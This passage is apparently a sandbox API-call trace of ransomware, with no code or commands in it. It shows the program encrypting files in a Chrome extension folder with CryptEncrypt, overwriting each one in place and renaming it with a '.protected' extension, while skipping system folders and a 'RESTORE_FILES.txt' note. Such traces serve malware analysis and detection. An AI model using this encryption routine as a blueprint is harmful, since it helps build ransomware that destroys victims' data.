lpString2="Windows") returned -1 [0078.881] lstrcmpiW (lpString1="icon_128.png", lpString2="Program Files") returned -1 [0078.881] lstrcmpiW (lpString1="icon_128.png", lpString2="Program Files (x86)") returned -1 [0078.881] lstrcmpiW (lpString1="icon_128.png", lpString2="$Recycle.bin") returned 1 [0078.881] lstrcmpiW (lpString1="icon_128.png", lpString2="System Volume Information") returned -1 [0078.881] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png") returned 142 [0078.881] StrStrIW (lpFirst="icon_128.png", lpSrch=".protected") returned 0x0 [0078.881] lstrcmpW (lpString1="icon_128.png", lpString2="RESTORE_FILES.txt") returned -1 [0078.881] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.881] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.882] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png") returned 142 [0078.883] StrStrW (lpFirst="icon_128.png", lpSrch=".txt") returned 0x0 [0078.883] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png") returned 142 [0078.883] StrStrW (lpFirst="icon_128.png", lpSrch=".rar") returned 0x0 [0078.883] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png") returned 142 [0078.883] StrStrW (lpFirst="icon_128.png", lpSrch=".zip") returned 0x0 [0078.883] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0xc8d, lpOverlapped=0x0) returned 1 [0078.884] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffff373, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.884] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xc8d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0xc8d, lpOverlapped=0x0) returned 1 [0078.884] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.884] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.884] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.884] CloseHandle (hObject=0x160) returned 1 [0078.885] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.protected") returned 152 [0078.885] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.protected")) returned 1 [0078.886] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.886] lstrcmpiW (lpString1="icon_16.png", lpString2="Windows") returned -1 [0078.886] lstrcmpiW (lpString1="icon_16.png", lpString2="Program Files") returned -1 [0078.886] lstrcmpiW (lpString1="icon_16.png", lpString2="Program Files (x86)") returned -1 [0078.886] lstrcmpiW (lpString1="icon_16.png", lpString2="$Recycle.bin") returned 1 [0078.886] lstrcmpiW (lpString1="icon_16.png", lpString2="System Volume Information") returned -1 [0078.886] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png") returned 141 [0078.886] StrStrIW (lpFirst="icon_16.png", lpSrch=".protected") returned 0x0 [0078.886] lstrcmpW (lpString1="icon_16.png", lpString2="RESTORE_FILES.txt") returned -1 [0078.886] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.886] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png") returned 141 [0078.887] StrStrW (lpFirst="icon_16.png", lpSrch=".txt") returned 0x0 [0078.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png") returned 141 [0078.887] StrStrW (lpFirst="icon_16.png", lpSrch=".rar") returned 0x0 [0078.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png") returned 141 [0078.887] StrStrW (lpFirst="icon_16.png", lpSrch=".zip") returned 0x0 [0078.887] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x8f, lpOverlapped=0x0) returned 1 [0078.888] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffff71, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.888] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x8f, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x8f, lpOverlapped=0x0) returned 1 [0078.888] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.888] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.888] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.888] CloseHandle (hObject=0x160) returned 1 [0078.888] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.protected") returned 151 [0078.888] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.protected")) returned 1 [0078.889] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.889] lstrcmpiW (lpString1="main.html", lpString2="Windows") returned -1 [0078.889] lstrcmpiW (lpString1="main.html", lpString2="Program Files") returned -1 [0078.889] lstrcmpiW (lpString1="main.html", lpString2="Program Files (x86)") returned -1 [0078.889] lstrcmpiW (lpString1="main.html", lpString2="$Recycle.bin") returned 1 [0078.889] lstrcmpiW (lpString1="main.html", lpString2="System Volume Information") returned -1 [0078.889] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html") returned 139 [0078.889] StrStrIW (lpFirst="main.html", lpSrch=".protected") returned 0x0 [0078.889] lstrcmpW (lpString1="main.html", lpString2="RESTORE_FILES.txt") returned -1 [0078.889] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.889] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.890] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html") returned 139 [0078.890] StrStrW (lpFirst="main.html", lpSrch=".txt") returned 0x0 [0078.890] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html") returned 139 [0078.890] StrStrW (lpFirst="main.html", lpSrch=".rar") returned 0x0 [0078.890] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html") returned 139 [0078.890] StrStrW (lpFirst="main.html", lpSrch=".zip") returned 0x0 [0078.890] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x5c, lpOverlapped=0x0) returned 1 [0078.891] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffffa4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.892] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x5c, lpOverlapped=0x0) returned 1 [0078.892] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.892] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.892] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.892] CloseHandle (hObject=0x160) returned 1 [0078.892] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.protected") returned 149 [0078.892] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.protected")) returned 1 [0078.893] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.893] lstrcmpiW (lpString1="main.js", lpString2="Windows") returned -1 [0078.893] lstrcmpiW (lpString1="main.js", lpString2="Program Files") returned -1 [0078.893] lstrcmpiW (lpString1="main.js", lpString2="Program Files (x86)") returned -1 [0078.893] lstrcmpiW (lpString1="main.js", lpString2="$Recycle.bin") returned 1 [0078.893] lstrcmpiW (lpString1="main.js", lpString2="System Volume Information") returned -1 [0078.893] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js") returned 137 [0078.893] StrStrIW (lpFirst="main.js", lpSrch=".protected") returned 0x0 [0078.893] lstrcmpW (lpString1="main.js", lpString2="RESTORE_FILES.txt") returned -1 [0078.893] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.893] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.893] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js") returned 137 [0078.893] StrStrW (lpFirst="main.js", lpSrch=".txt") returned 0x0 [0078.893] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js") returned 137 [0078.893] StrStrW (lpFirst="main.js", lpSrch=".rar") returned 0x0 [0078.893] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js") returned 137 [0078.893] StrStrW (lpFirst="main.js", lpSrch=".zip") returned 0x0 [0078.893] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x5b, lpOverlapped=0x0) returned 1 [0078.894] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffffa5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.894] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x5b, lpOverlapped=0x0) returned 1 [0078.894] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.894] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.894] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.894] CloseHandle (hObject=0x160) returned 1 [0078.894] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.protected") returned 147 [0078.895] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.protected")) returned 1 [0078.895] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.895] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0078.895] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files") returned -1 [0078.895] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0078.895] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0078.895] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0078.895] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json") returned 143 [0078.895] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0078.895] lstrcmpW (lpString1="manifest.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.895] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.895] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.896] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json") returned 143 [0078.896] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0078.896] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json") returned 143 [0078.896] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0078.896] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json") returned 143 [0078.896] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 0x0 [0078.896] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2d5, lpOverlapped=0x0) returned 1 [0078.897] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffffd2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.897] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2d5, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2d5, lpOverlapped=0x0) returned 1 [0078.897] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.897] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.898] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.898] CloseHandle (hObject=0x160) returned 1 [0078.898] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.protected") returned 153 [0078.898] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.protected")) returned 1 [0078.898] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.898] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0078.898] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0078.898] lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0078.899] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0078.899] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0078.899] wnsprintfW 